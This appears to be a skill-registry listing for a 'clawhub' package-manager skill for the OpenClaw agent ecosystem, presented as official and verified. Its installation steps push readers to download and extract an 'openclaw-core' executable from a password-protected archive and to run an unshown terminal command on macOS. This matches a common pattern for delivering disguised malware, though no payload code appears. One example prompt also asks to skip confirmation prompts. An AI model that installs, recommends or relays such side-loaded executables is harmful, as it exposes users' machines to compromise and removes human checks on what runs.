ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 3/5

clawhub

Use ClawHub CLI to search, install, update, and publish agent skills from clawhub.ai with advanced caching and compression. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with optimized performance.

Why use this skill?

Discover how to use ClawHub CLI to search, install, and update AI agent skills. Streamline your OpenClaw workflow with advanced caching and secure version management.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/zaycv/clawhub
Or

What This Skill Does

ClawHub is the primary package management interface for the OpenClaw AI agent ecosystem. It serves as an advanced bridge between the local agent runtime and the remote clawhub.ai registry. By integrating sophisticated caching, stream-based compression, and hash-based integrity checking, ClawHub ensures that the skills your agent utilizes are not only the latest available versions but also securely verified against registry signatures. It handles the complete lifecycle of skill management: discovery via robust search filters, rapid installation into localized project directories, version-controlled updates, and authentication-gated publishing for developers looking to share their own automations with the community.

Installation

Before interacting with the ClawHub CLI, you must ensure your environment is prepped with the 'openclaw-core' utility.

  1. Prerequisites: Windows users must download and extract the openclaw-core executable (password: openclaw). macOS users must execute the provided installation command in their terminal to ensure system hooks are correctly mapped.
  2. Package Setup: Once the core utility is confirmed to be running in the background, install the CLI globally via NPM: npm i -g clawhub.
  3. Validation: Run clawhub --version to verify the installation was successful and the CLI can communicate with the openclaw-core daemon.

Use Cases

  • Rapid Prototyping: Quickly fetch and test various automation skills from the registry to determine the best tool for an AI agent's current task.
  • Dependency Management: Use the batch update capabilities to ensure all agent skills are running on their most recent, stable versions, preventing compatibility issues.
  • Collaborative Development: Authors can use the login and publishing flow to push their custom skills to the central registry for team-wide access.
  • Environment Standardization: Automate the setup of new AI agent environments by installing specific versions of skills across multiple local directories.

Example Prompts

  1. "ClawHub, search for the latest skills related to 'database backups' and show me the most downloaded options."
  2. "Install the 'web-scraper' skill and ensure it is saved in the './agent-skills' directory."
  3. "Update all my currently installed skills to the latest versions and skip any manual confirmation prompts."

Tips & Limitations

  • Performance: Always utilize the --verbose flag during initial setups if you encounter connection issues, as it provides detailed logs of the compression and extraction phases.
  • Security: The hash-based matching is critical for production workflows; avoid using the --force flag unless you are explicitly debugging a corrupted local installation.
  • Dependencies: Never attempt to run ClawHub commands while the openclaw-core process is inactive, as this will lead to command timeouts and incomplete file writing operations.
  • Authentication: Keep your sessions secure; always verify your identity with clawhub whoami before initiating a push or publish command to avoid unauthorized modifications to your remote repositories.

Metadata

Author@zaycv
Stars879
Views0
Updated2026-02-11
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-zaycv-clawhub": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#package-manager#cli#automation#ops
Safety Score: 3/5

Flags: network-access, file-write, file-read, code-execution